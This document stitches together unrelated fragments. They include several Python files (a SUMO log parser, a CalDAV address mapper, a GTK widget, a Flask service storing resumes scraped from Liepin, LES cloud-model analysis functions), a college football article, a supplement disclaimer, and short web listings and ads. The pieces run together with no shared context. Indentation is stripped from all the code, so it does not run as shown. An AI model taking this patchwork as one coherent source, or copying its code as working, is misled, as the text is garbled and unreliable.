outline = CenteredRectangle(*self._outline)
ctx.setActiveLayer("overlay")
outline.draw(ctx)
for cp in self._centers:
with ctx.transform.translation(*cp):
ctx.setActiveLayer("copper")
pad.draw(ctx)
ctx.setActiveLayer("mask")
mask.draw(ctx)
|
Who Are You Looking For In Eland, Wisconsin?
Run a search by name for anyone in Eland, Wisconsin & get free white pages information instantly. Eland, Wisconsin white page directory listings include full name, phone number and address.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@file analyze_teleports.py
@author Jakob Erdmann
@date 2012-11-20
@version $Id: analyze_teleports.py 14425 2013-08-16 20:11:47Z behrisch $
Extract statistics from the warning outputs of a simulation run for plotting.
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2008-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import os,sys
import re
from collections import defaultdict
def parse_log(logfile, edges=True, aggregate=3600):
print "Parsing %s" % logfile
reFrom = re.compile("lane='([^']*)'")
reTime = re.compile("time=(\d*)\.")
# counts per lane
waitingCounts = defaultdict(lambda:0)
collisionCounts = defaultdict(lambda:0)
# counts per step
waitingStepCounts = defaultdict(lambda:0)
collisionStepCounts = defaultdict(lambda:0)
for line in open(logfile):
try:
if "Warning: Teleporting vehicle" in line:
edge = reFrom.search(line).group(1)
time = reTime.search(line).group(1)
if edges:
edge = edge[:-2]
if "collision" in line:
collisionCounts[edge] += 1
collisionStepCounts[int(time) / aggregate] += 1
else:
waitingCounts[edge] += 1
waitingStepCounts[int(time) / aggregate] += 1
except:
print sys.exc_info()
sys.exit("error when parsing line '%s'" % line)
return (waitingCounts, collisionCounts,
waitingStepCounts, collisionStepCounts)
def print_counts(countDict, label):
counts = [(v,k) for k,v in countDict.items()]
counts.sort()
print counts
print label, 'total:', sum(countDict.values())
def main(logfile):
waitingCounts, collisionCounts, waitingStepCounts, collisionStepCounts = parse_log(logfile)
print_counts(waitingCounts, 'waiting')
print_counts(collisionCounts, 'collisions')
# generate plot
min_step = min(min(waitingStepCounts.keys()),
min(collisionStepCounts.keys()))
max_step = max(max(waitingStepCounts.keys()),
max(collisionStepCounts.keys()))
plotfile = logfile + '.plot'
with open(plotfile, 'w') as f:
f.write("# plot '%s' using 1:2 with lines title 'waiting', '%s' using 1:3 with lines title 'collisions'\n" % (
plotfile, plotfile))
for step in range(min_step, max_step + 1):
print >>f, ' '.join(map(str,[step, waitingStepCounts[step], collisionStepCounts[step]]))
if __name__ == "__main__":
main(*sys.argv[1:])
|
Michigan State’s offense wasn’t pretty, even when it worked Saturday.
EAST LANSING — Michigan State’s offense wasn’t pretty, even when it worked Saturday.
Missed assignments and miscommunication by the offensive line. Wrong routes and drops by the wide receivers. Struggles at running back and quarterback. Faulty play-calling and stalled drives.
Even Tyler O’Connor’s touchdown pass to Delton Williams came off glitchy, with the shotgun snap nearly hitting an in-motion R.J. Shelton and turning into a loose ball situation.
The timing is off, no question. But beyond the naked eye, the DVR rewinding and slow-motion video/still-photo analysis, the Spartans’ struggles simply do not rest solely on O’Connor’s head and shoulders.
No doubt, mistakes were made offensively in the 24-21 overtime loss to Indiana, MSU’s second straight to start Big Ten play. They came from young players like Donnie Corley and veterans like Brandon Clemons.
And, yes, they came from O’Connor, too.
The Spartans produced 438 yards of offense, including 234 from O’Connor’s arm and 36 more from his legs. However, he failed to get the offense on the same page and needed to burn a timeout on second down in overtime, with his teammates confused and frustrated.
Then came two sacks of the fifth-year senior on the next two snaps. O’Connor admitted afterward that he probably should have handed off the ball on the first play to LJ Scott on the run-pass option. But sophomore left tackle David Beedle’s man beat him off the edge and dropped the quarterback. On the next play, Beedle missed a “twist exchange” with junior Brian Allen, and O’Connor didn’t have a chance to even get rid of the ball.
Beedle also had a pair of false starts, part of why MSU is shuffling its offensive line for this week’s game against BYU (3:30 p.m./ABC).
“I always talk about the thumb,” offensive line coach Mark Staten said Wednesday as he pointed to his own chest. “I always talk about, ‘Hey, what’s Mark Staten doing?’ and the O-line trying to take that, ‘Hey, what am I doing?’ philosophy.
Three freshmen receivers are now in the six-man rotation, but Corley dropped a deep O’Connor pass from the end zone in the third quarter, which landed on his hands in stride. It could have been a touchdown, or at least a big third-down conversion. Add that in and O’Connor eclipses 300 yards and might have four TD passes.
Mark Dantonio said those young wideouts also struggled with their assignments.
“What you also don't recognize is that a route needs to be run at 18 (yards) and it’s run at 13 – big difference for the quarterback,” Dantonio said. “You've got some drops out there. You've got a guy running a route or not running a route when it's a pass route and he's out there blocking. I mean, that causes a problem for the quarterback.
Solari: Time for Michigan State to fix present or look to future?
Even the players who returned with experience this season hadn’t played the same significant roles during the past three years. There’s an adjustment period when you lose players to the pros such as Connor Cook, Aaron Burbridge, Jack Allen, Jack Conklin and Donavon Clark.
Perhaps the surprising reality is MSU’s offense is actually producing more yardage than it was a year ago at this time (406.2 per game in 2016 through four games, 372.2 in 2015). It has four more first downs as well.
One of the problems has come in finishing drives – the Spartans had five more touchdowns last season and six fewer turnovers. MSU also is converting just 38% of its 56 third-down chances compared to 49% of just 49 third downs a year ago.
O’Connor is throwing for 20 more yards per game than Cook did a year ago as a fifth-year senior and has eight TD passes to Cook’s nine. The five interceptions and lost fumble this season, though, are a big difference in the quarterback spot. So, too, are the eight sacks O’Connor has absorbed compared to the three times Cook was dropped in last year’s first four games.
The Scott-Gerald Holmes-Madre London trio has run for 30 more yards this season. They also have just four TDs to eight at this time a year ago, and Scott’s costly fumble swung momentum in the loss to Wisconsin.
And that doesn’t even get into the ongoing issue with penalties.
Yet there are two major differences in a year: the Spartans are scoring 10.4 fewer points, and they are 2-2 instead of 4-0.
And those are the stats that matter most. As Dantonio has said, it’s a collective failure on that front. Fixing those smaller issues are the only way to correct the larger ones.
|
##
# Copyright (c) 2005-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from twisted.internet.defer import inlineCallbacks, returnValue
from twext.python.log import Logger
from twistedcaldav.config import config
from twistedcaldav.memcacher import Memcacher
from txdav.caldav.datastore.scheduling.caldav.delivery import ScheduleViaCalDAV
from txdav.caldav.datastore.scheduling.cuaddress import RemoteCalendarUser, EmailCalendarUser, InvalidCalendarUser
from txdav.caldav.datastore.scheduling.delivery import DeliveryService
from txdav.caldav.datastore.scheduling.imip.delivery import ScheduleViaIMip
from txdav.caldav.datastore.scheduling.ischedule.delivery import ScheduleViaISchedule
__all__ = [
"ScheduleAddressMapper",
"mapper",
]
log = Logger()
"""
Handle mapping a calendar user address to a schedule delivery type.
"""
class ScheduleAddressMapper(object):
"""
Class that maps a calendar user address into a delivery service type.
"""
def __init__(self):
# We are going to cache mappings whilst running
self.cache = Memcacher("ScheduleAddressMapper", no_invalidation=True)
@inlineCallbacks
def getCalendarUser(self, cuaddr):
# Get the type
cuaddr_type = (yield self.getCalendarUserServiceType(cuaddr))
if cuaddr_type == DeliveryService.serviceType_caldav:
returnValue(InvalidCalendarUser(cuaddr))
elif cuaddr_type == DeliveryService.serviceType_ischedule:
returnValue(RemoteCalendarUser(cuaddr))
elif cuaddr_type == DeliveryService.serviceType_imip:
returnValue(EmailCalendarUser(cuaddr))
else:
returnValue(InvalidCalendarUser(cuaddr))
@inlineCallbacks
def getCalendarUserServiceType(self, cuaddr):
# Try cache first
cuaddr_type = (yield self.cache.get(str(cuaddr)))
if cuaddr_type is None:
serviceTypes = (ScheduleViaCalDAV,)
if config.Scheduling[DeliveryService.serviceType_ischedule]["Enabled"]:
serviceTypes += (ScheduleViaISchedule,)
if config.Scheduling[DeliveryService.serviceType_imip]["Enabled"]:
serviceTypes += (ScheduleViaIMip,)
for service in serviceTypes:
matched = (yield service.matchCalendarUserAddress(cuaddr))
if matched:
yield self.cache.set(str(cuaddr), service.serviceType())
returnValue(service.serviceType())
returnValue(cuaddr_type)
def isCalendarUserInMyDomain(self, cuaddr):
# Check whether it is a possible local address
def _gotResult(serviceType):
return serviceType == DeliveryService.serviceType_caldav
d = self.getCalendarUserServiceType(cuaddr)
d.addCallback(_gotResult)
return d
mapper = ScheduleAddressMapper()
|
No OPTIONS for company (ALF) AUSTRALIAN LEADERS FUND LIMITED.
No Warrants for company (ALF) AUSTRALIAN LEADERS FUND LIMITED.
Server processing from 2019-04-19 18:55:56 thru 2019-04-19 18:55:56 GMT for 0 secs.
|
# Run with Python 3
# install python3-espeak
# /usr/lib/python3/dist-packages/espeak/espeak.py
from espeak import espeak
import sys
done = False
while ( done == False ):
print()
print( "1. Display voices" )
print( "2. Speak text" )
print( "3. View espeak functions" )
choice = int( input( "What do you want to do? >> " ) )
print()
if ( choice == 1 ):
print( "VOICES" )
voices = espeak.list_voices()
print( "Identifier","Name","Gender","Age","Variant" )
for voice in voices:
print( "Name: ", voice.name )
print( "Identifier: ", voice.identifier )
print( "Gender: ", voice.gender )
print( "Age: ", voice.age )
print( "Variant: ", voice.variant )
print()
elif ( choice == 2 ):
print( "SPEAK" )
voice = input( "What voice do you want to use? >> " )
espeak.set_voice( voice )
text = input( "What do you want to say? >> " )
print( "Saying \"" + text + "\"" )
espeak.synth( text )
elif ( choice == 3 ):
print( "FUNCTIONS" )
for member in dir( espeak ):
print( member )
|
This site does not provide Medical or Health Care Advice. This site is intended for use by adults only.
The information on this page is informational in nature and should never be construed as a substitute for medical advice. The information on this site should never be used as a diagnosis or medical treatment. If necessary, consult your doctor, general practitioner, dietitian or nutritionist before beginning any diet, exercise or supplementation program, before taking any medication or nutritional supplement, or if you have or suspect that you might have a health problem.
Information on this site is for information purposes only. Information on this site is not intended as a substitute for advice from your doctor, G.P, physician or health care professional.
Claims made about any products on this site are not intended to diagnose, treat, cure or prevent disease/s. You are advised against relying on any information or claim made about products on our site as the information/data/content is provided as means of general information. Professional and/or specialist advice is highly recommended before taking any action relating to nutrition and health.
You are advised against using information on this site to diagnose or treat any health issue or as a substitute for meditation or treatment prescribed by your doctor, GP, physician or health care professional.
Always consult your doctor, GP, physician or health care professional before taking any medication, nutritional supplement, diet, exercise or physical/nutritional program.
You are advised to consult your doctor, GP, physician or health care professional in regards to any potential adverse interactions between medication you may be currently using and nutritional supplements you may buy from www.samskaratribe.com or even any other nutritional supplement you may be taking.
We try our level best to keep the website updated, with accurate and honest information however We strictly do not make any representations, warranties or guarantees (whether express or implied) that the content on this website is complete, accurate and up-to-date as per market knowledge.
Having in mind our activity across various social medias, websites and collaborations, we honestly confess, although we have financial interest in the products we speak and promote, Users/visitors/Buyers of www.samskaratribe.com should be assured that we, at www.samskaratribe.com will never recommend anything we do not believe in ourselves or wouldn’t use ourselves.
We provide substancial information on the individual product pages, including ‘Suggested use’ information for best results. We highly recommend users not to any consume food/supplementation multiple amount of times within a short span of time (ideally once in 2 hour span) so your food gets digested well, you maintain energy and the digestive process doesn’t get confused.
Our website (www.samskaratribe.com) offers products with the prime intention to improve health, and thus we inform all you/users/buyers that our products do not necessarily taste pleasant as our intention remains to keep our products organic and ecological, strictly away from chemicals, genetically modified organisms, gluten, artificial flavours/ings free and sugar free.
With the intention to sell bio available products with least processing, closest to it’s natural and consumable stage and state, we (www.samskaratribe.com) hence do not guarantee our products to taste as ideal or pleasant as other supplements.
We highly recommend users to be cautious about different combination of foods, be it (a) foods bought from this website (www.samskaratribe.com) (b) food bought from this website (www.samskaratribe.com) and any external source, (c) food bought entirely from external source. Consult your doctor, GP, physician or health care professional if necessary before combining different foods together. This site (www.samskaratribe.com) takes absolutely no responsibility for adverse reactions resulting from use of any food bought from our site (www.samskaratribe.com) or even any external source. The user is entirely held responsible for the way they choose to combine their products. We (www.samskaratribe.com) have prepared a series of combination products (Samskara Booster Combos) that in our knowledge, experience, learning and experiments have proved to be a suitable combination for consumption, any combination suggestions or ideas made outside our website, or under user comments section of our website is considered void and not recomendable from us.
|
from test.test_support import run_unittest, have_unicode
import unittest
import sys
class TestImplementationComparisons(unittest.TestCase):
def test_type_comparisons(self):
self.assertTrue(str < int or str > int)
self.assertTrue(int <= str or int >= str)
self.assertTrue(cmp(int, str) != 0)
self.assertTrue(int is int)
self.assertTrue(str == str)
self.assertTrue(int != str)
def test_cell_comparisons(self):
def f(x):
if x:
y = 1
def g():
return x
def h():
return y
return g, h
g, h = f(0)
g_cell, = g.func_closure
h_cell, = h.func_closure
self.assertTrue(h_cell < g_cell)
self.assertTrue(g_cell >= h_cell)
self.assertEqual(cmp(g_cell, h_cell), 1)
self.assertTrue(g_cell is g_cell)
self.assertTrue(g_cell == g_cell)
self.assertTrue(h_cell == h_cell)
self.assertTrue(g_cell != h_cell)
def test_main():
run_unittest(TestImplementationComparisons)
if __name__ == '__main__':
test_main()
|
The ministry and mission of St Thomas’ Church is enabled entirely through the generosity of its church members, many of whom give sacrificially of their time, their talents, and their finance to support the work of the church.
If you would like to give of your time or your talents to support the work of the church, please see our Get Involved pages for more information on how you can do this.
If you would like to contribute financially to support the ministry of the church, please find a Standing Order form here. If you are a tax-payer, it is a great benefit to the church if you can give tax-efficiently (we can claim back 25p for every £1 you donate). Please find a Gift Aid form here. Please return completed forms to: The Treasurer, St Thomas’s Church Office, Marton St, Lancaster, LA1 1XX.
|
#
# This file is part of KwarqsDashboard.
#
# KwarqsDashboard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# KwarqsDashboard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with KwarqsDashboard. If not, see <http://www.gnu.org/licenses/>.
#
import gtk
import gobject
from .image_button import ImageButton
class ToggleButton(gtk.HBox):
'''
Similar to a GTK CheckButton, but different. A different pixbuf is
shown depending on the button toggled state.
.. seems like they should already have this implemented, but I can't
find one.
'''
__gsignals__ = {
'toggled': (gobject.SIGNAL_ACTION, gobject.TYPE_NONE, ()),
}
def __init__(self, active_pixbuf, inactive_pixbuf, label=None, clickable=False, default=False):
'''
:param active_pixbuf: The pixbuf to be shown when the button is in the 'active' state
:param inactive_pixbuf: The pixbuf to be shown when the button is in the 'inactive' state
:param label: Text to show with the button
:param clickable: Does the button accept user input?
:param default: The default state for the button: True is active, False is inactive
'''
gtk.HBox.__init__(self)
self.set_spacing(5)
self.image_button = ImageButton()
self.pack_start(self.image_button, False, False)
self.active = not default
self.active_pixbuf = active_pixbuf
self.inactive_pixbuf = inactive_pixbuf
if clickable:
self.image_button.connect('clicked', self.on_clicked)
if label is not None:
self.label = gtk.Label(label)
self.pack_start(self.label, False, False)
self.set_active(default)
def on_clicked(self, widget):
self.set_active(not self.active)
def get_active(self):
return self.active
def set_active(self, active):
if active != self.active:
self.active = active
if active:
self.image_button.set_from_pixbuf(self.active_pixbuf)
else:
self.image_button.set_from_pixbuf(self.inactive_pixbuf)
self.emit('toggled')
gobject.type_register(ToggleButton)
|
Morris Property are delighted to OFFER FOR LET, this recently redecorated two bed mid terrace property. Located within walking distance of Padiham town centre the property is offered as a long term let and is ideal for a small family given its location to local shops, schools and local amenities.
The property briefly comprises of small flagged garden, entrance, living room with feature fire place, kitchen with mix of wall and base units and door leading to private walled yard. First floor, stairs/landing leading to rear facing single bedroom and front double bedrooms.
This property is currently let.
|
# -*- coding: utf-8 -*-
import bs4
import time
import flask
import flask_restful
from flask_restful import Resource, reqparse
import tools.image
class LiepinPluginSyncObject(object):
committer = 'PLUGIN'
def __init__(self, url, htmlsource, base64email, base64phone):
self.url = url
self.htmlsource = htmlsource
self.base64email = base64email
self.base64phone = base64phone
self.raw_html, self.raw_yaml = self.parse_source()
self.info = self.generate_yaml()
self.loginfo = ''
self.parse_result = False
def generate_yaml(self):
info = dict()
info.update(self.raw_yaml)
info['committer'] = 'PLUGIN'
info['origin'] = u'猎聘爬取'
#info['email'] = self.email_from_base64()
#info['phone'] = self.phone_from_base64()
return info
def email_from_base64(self):
img = tools.image.image_from_base64(self.base64email)
preimg = tools.image.preprocess(img)
result = tools.image.image_to_string(preimg)
return result.replace(' ', '')
def phone_from_base64(self):
img = tools.image.image_from_base64(self.base64phone)
preimg = tools.image.preprocess(img)
result = tools.image.image_to_string(preimg)
return result.replace(' ', '')
def parse_source(self):
bs = bs4.BeautifulSoup(self.htmlsource, 'lxml')
details = dict()
details['date'] = time.time()
details['filename'] = self.url
idtag = bs.find('span', attrs={'data-nick':'res_id'})
details['id'] = idtag.text
details['originid'] = idtag.text
login_form = bs.find(class_='user-login-reg')
if login_form is not None:
self.loginfo = 'NoLoginError'
self.parse_result = False
return '', {}
side = bs.find(class_='side')
side.decompose()
footer = bs.find('footer')
footer.decompose()
javascripts = bs.findAll('script')
for js in javascripts:
js.decompose()
alinks = bs.findAll('a')
for a in alinks:
a.decompose()
content = bs.find(class_='resume')
self.parse_result = True
return content.prettify(), details
def add_new(self, cvstorage):
result = False
if self.info['id']:
if len(self.raw_html) < 500:
self.loginfo = (' ').join([self.info['id'], 'too short.'])
else:
if not cvstorage.exists(self.info['id']):
result = cvstorage.addcv(self.info['id'],
self.raw_html.encode('utf-8'), self.info)
else:
self.loginfo = (' ').join([self.info['id'], 'exists'])
else:
self.loginfo = "without ID."
if result is True:
print((' ').join(["Plugin add Liepin", self.info['id']]))
else:
print((' ').join(["Plugin add Liepin failed", self.loginfo]))
return result
class BrowserSyncAPI(Resource):
def __init__(self):
super(BrowserSyncAPI, self).__init__()
self.reqparse = reqparse.RequestParser()
self.LIEPIN_STO_CV = flask.current_app.config['LIEPIN_STO_CV']
self.reqparse.add_argument('url', type = unicode, location = 'json')
self.reqparse.add_argument('html', type = unicode, location = 'json')
self.reqparse.add_argument('base64email', type = unicode, location = 'json')
self.reqparse.add_argument('base64phone', type = unicode, location = 'json')
def post(self):
args = self.reqparse.parse_args()
url = args['url']
html = args['html']
base64email = args['base64email']
base64phone = args['base64phone']
id = ''
result = False
if 'liepin' in url:
lpso = LiepinPluginSyncObject(url, html, base64email, base64phone)
result = lpso.add_new(self.LIEPIN_STO_CV)
if result is True:
id = lpso.info['id']
return {'code': 200, 'url': url, 'result': result, 'id': id}
app = flask.Flask(__name__)
app.config.from_object('plugins.server.settings')
api = flask_restful.Api(app)
api.add_resource(BrowserSyncAPI, '/api/browsersync', endpoint = 'browsersync')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5888, threaded=True)
|
“Tut Elimden” is movie produced at 2017. See what information about this film we collected at our service. You can also check other movies in the same genres by click at genre name. If you are interests movies released at 2017 you can click at year. You can also check other movies with the same cas or with the same writer and director. This is very simple, just click at the name. You can also find posters, still photos and trailers connected whith this production.
|
# Functions extracting emulator and any other data from LES output NetCDF files,
# and collection of functions for generating LES inputs.
#
# Tomi Raatikanen 18.1.2019
#
# Functions
# =========
# Use Python import to make these functions available, e.g. from LES2emu import GetEmuVars, get_netcdf_variable
#
# a) Functions for extracting data from the LES outputs
# GetEmu2Vars(path)
# GetEmu1Vars(fname,tstart,tend,[ttol,start_offset,end_offset])
# get_netcdf_variable(fname,var_name,target_time,[end_time])
# extract_write_data(fname_template,specs,[name_out,nmax])
# get_netcdf_updraft(fname,tstart,tend,[ttol,tol_clw])
#
# b) Functions for generating LES inputs
# calc_cloud_base(p_surf,theta,rw)
# calc_lwc_altitude(p_surf,theta,rw,zz)
# solve_rw(p_surf,theta,lwc,zz)
# solve_rw_lwp(p_surf,theta,lwp,pblh)
#
# c) Helper functions
# calc_psat_w(T)
# calc_sat_mixr(p,T)
# calc_rh(rw,T,press)
#
# Notes
# =====
# 1) Input file name should contain complete path in addition to the file name
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# 2) Voima requires python 2.7.10, so execute "module load Python/2.7.10"
#
def GetEmu1Vars(fname,tstart,tend,ttol=3600.,start_offset=0,end_offset=0):
# Function calculates LES output variables for emulator v1.0 as defined in the ECLAIR proof-of-concept document
# https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
# Inputs:
# fname Complete path and name of a time statistics file (*.ts.nc)
# start, tend Time window (s)
# Optional inputs
# ttol Time tolelance (s) for finding averaging window
# start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
# end_offset -||- end ind index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# tstart=2.5*3600
# tend=3.5*3600
# cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std = GetEmu1Vars(file,tstart,ttol=10.,start_offset=1)
#
import os
import netCDF4 as netcdf
import numpy
#
# Outputs
cfrac=-999. # Cloud fraction
CDNC=-999. # Cloud droplet number concentration in cloudy columns (#/kg)
prcp=-999. # Precipitation tendency = domain mean surface precipitation (kg/m^2/s)
dn=-999. # In-cloud aerosol number loss tendency = change in interstitial aerosol+cloud droplet number concentration in cloudy columns (#/kg/s)
we=-999. # Mixing between FT and BL = domeain mean entrainment velocity (m/s)
#
# ... and their standard deviations
cfrac_std=-999.; CDNC_std=-999.; prcp_std=-999.; dn_std=-999.; we_std=-999.
#
# File must exist
if not os.path.lexists(fname):
print fname+' not found!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
# Time
# ====
if 'time' not in ncid.variables:
print 'Time not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
times = ncid.variables['time']
#
# Find the closest matching time points
ind_tstart=0
ind_tend=0
i=0
for t in times:
if abs(t-tstart)<abs(times[ind_tstart]-tstart): ind_tstart=i
if abs(t-tend)<abs(times[ind_tend]-tend): ind_tend=i
i+=1
#
if abs(times[ind_tstart]-tstart)>ttol or abs(times[ind_tend]-tend)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Apply offset (typically the first point is ignored
ind_tstart+=start_offset
ind_tend+=end_offset
if ind_tstart<0 or ind_tstart>ind_tend or ind_tend>=len(times):
print 'Invalid data range for '+fname+': ',ind_tstart,ind_tend,len(times)
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
#
# Outputs
# ========
# Cloud fraction
if 'cfrac' not in ncid.variables:
print 'Cloud fraction not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Need cloud fractions for normalizing domain mean interstitial and cloud droplet number concentrations
cfrac_ts=ncid.variables['cfrac'][ind_tstart:ind_tend]
ncfrac = sum( cfrac_ts>0.0 ) # The number of non-zero cloud fractions
#
cfrac = numpy.mean( cfrac_ts )
cfrac_std = numpy.std( cfrac_ts )
#
if 'Nc_ic' in ncid.variables: # Level 4 = SALSA microphysics
# Cloud droplet number concentration averaged over cloudy columns (#/kg)
CDNC,CDNC_std=average_scaled(ncid.variables['Nc_ic'][ind_tstart:ind_tend],cfrac_ts)
#
# Surface precipitation (kg/m^2/s)
if ind_tstart < ind_tend:
prcp = numpy.mean( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
prcp_std = numpy.std( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
else:
prcp = ncid.variables['rmH2Opr'][ind_tstart]
prcp_std = -999.
#
# Change in in-cloud aerosol+cloud droplet number concentration
if ncfrac>=2: # Linear fit needs at least two data points
tt = ncid.variables['time'][ind_tstart:ind_tend] # Time (s) vector
nc = ncid.variables['Nc_ic'][ind_tstart:ind_tend] # Cloud droplets (domain mean)
nc += ncid.variables['Na_int'][ind_tstart:ind_tend] # + interstitial aerosol (domain mean)
# Normalize by cloud fraction => concentrations for cloudy columns
i=0
for cf in cfrac_ts:
if cf>0:
nc[i]/=cf
else:
# Divide-by-zero => NaN
nc[i]=float('nan')
i+=1
#
a,dn,a_std,dn_std=ls_fit(tt,nc) # Least squares fit (nc=a+b*tt)
else:
dn=-999.
dn_std=-999.
else: # Level 3 = saturation adjustment method (given CDNC)
# Cloud droplet number concentration (#/kg): fixed
if ind_tstart < ind_tend:
CDNC = numpy.mean( ncid.variables['CCN'][ind_tstart:ind_tend] )
CDNC_std = numpy.std( ncid.variables['CCN'][ind_tstart:ind_tend] )
else:
CDNC = ncid.variables['CCN'][ind_tstart]
CDNC_std = -999.
#
# Surface precipitation (kg/m^2/s): variable prcp is in W/m^2=J/s/m^2, which can be
# converted to kg using latent heat of vaporization (2.5e+06 J/kg)
if ind_tstart < ind_tend:
prcp = numpy.mean( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
prcp_std = numpy.std( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
else:
prcp = ncid.variables['prcp'][ind_tstart]/2.5e6
prcp_std = -999.
#
# Change in in-cloud aerosol+cloud droplet number concentration: N/A
#
# Entrainment velocity (m/s)
# we=dz/dt+D*z, where z is PBL height and D is large scale divergence (1.5e-6 1/s) (see e.g. Kazil et al., ACP, 2016).
if ind_tstart < ind_tend:
# Must have at least two points for the slope, but should haev more than that
zz = ncid.variables['zi1_bar'][ind_tstart:ind_tend] # PBL height (m) vector
tt = ncid.variables['time'][ind_tstart:ind_tend] # Time (s) vector
a,dzdt,a_std,dzdt_std=ls_fit(tt,zz) # Least squares fit (zz=a+b*tt)
z=numpy.mean(zz) # Mean PBL height
we=dzdt+1.5e-6*z
we_std=dzdt_std
else:
we = -999.
we_std = -999.
#
# Close file
ncid.close()
#
# All done
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
def get_netcdf_updraft(fname,tstart,tend,ttol=3600.,tol_clw=1e-5):
# Function for calculating mean positive updraft velocities and cloud droplet number concentrations
# at cloud base (see Romakkaniemi et al., 2009) from 4D data (*.nc).
#
# Romakkaniemi, S., G. McFiggans, K.N. Bower, P. Brown, H. Coe, T.W. Choularton, A comparison between
# trajectory ensemble and adiabatic parcel modelled cloud properties and evaluation against airborne
# measurements, J. Geophys. Res., doi:10.1029/2008JD011286, 2009
#
# Inputs:
# fname Complete file path and name (*.nc)
# start, tend Averaging time window (s)
# Optional inputs
# ttol Time tolelance (s) for finding averaging window
# tol_clw Cloud liquid water mixing ratio (kg/kg) for the cloud base
#
# Example:
# file='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/emul001/emul001.nc'
# w,cdnc,cdnc_w,n=get_netcdf_updraft(file,9000.,12600.,ttol=10.)
# print w,cdnc,cdnc_w,n
#
import os
import netCDF4 as netcdf
import numpy
#
# File must exist
if not os.path.lexists(fname):
raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif 'w' not in ncid.variables:
raise RuntimeError('Variable w not found from '+fname+'!')
elif 'l' not in ncid.variables:
raise RuntimeError('Variable l not found from '+fname+'!')
elif 'time' not in ncid.variables['w'].dimensions or 'time' not in ncid.variables['l'].dimensions:
raise RuntimeError('Time is not a dimension for w or l (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Dimensions
dims=ncid.variables['l'][0,].shape # x, y, z
#
# Optional: CDNC from UCLALES-SALSA simulations
cdnc_calc='S_Nc' in ncid.variables
#
#
# Outputs
wpos=0. # Mean positive updraft velocity at the cloud base (m/s)
w2pos=0. # Velocity weighted mean positive updraft velocity at the cloud base (m/s)
cdnc_p=0. # Mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
cdnc_wp=0. # Velocity weigted mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
n=0 # Number of cloud bases with positive updraft (-)
#
ind=-1
for tt in times:
# Time range
ind+=1
if tt<tstart-ttol:
continue
elif tt>tend+ttol:
break # Assuming monotonic time
#
# Data
w=ncid.variables['w'][ind,]
l=ncid.variables['l'][ind,]
if cdnc_calc: cdnc=ncid.variables['S_Nc'][ind,]
#
# Calculations
if True:
# This is much faster
for i in range(0,dims[0]):
for j in range(0,dims[1]):
kk, = numpy.where(l[i,j,:]>tol_clw)
if len(kk)>0 and w[i,j,kk[0]]>0.:
k=kk[0]
n+=1
wpos+=w[i,j,k]
w2pos+=w[i,j,k]**2
if cdnc_calc:
cdnc_p+=cdnc[i,j,k]
cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
else:
# The old method
i=0; j=0
while i<dims[0] and j<dims[1]:
k=0
while k<dims[2]:
if l[i,j,k]>tol_clw:
# Found cloud base, but only the positive updraft velocities are counted
if w[i,j,k]>0.:
n+=1
wpos+=w[i,j,k]
w2pos+=w[i,j,k]**2
if cdnc_calc:
cdnc_p+=cdnc[i,j,k]
cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
break
k+=1
if j+1<dims[1]:
j+=1
else:
i+=1
j=0
#
if n>0:
w2pos/=wpos
wpos/=n
if cdnc_calc:
cdnc_p/=n
cdnc_wp/=(wpos*n)
else:
cdnc_p=-999.
cdnc_wp=-999.
else:
wpos=-999.
w2pos=-999.
cdnc_p=-999.
cdnc_wp=-999.
#
# Close file
ncid.close()
#
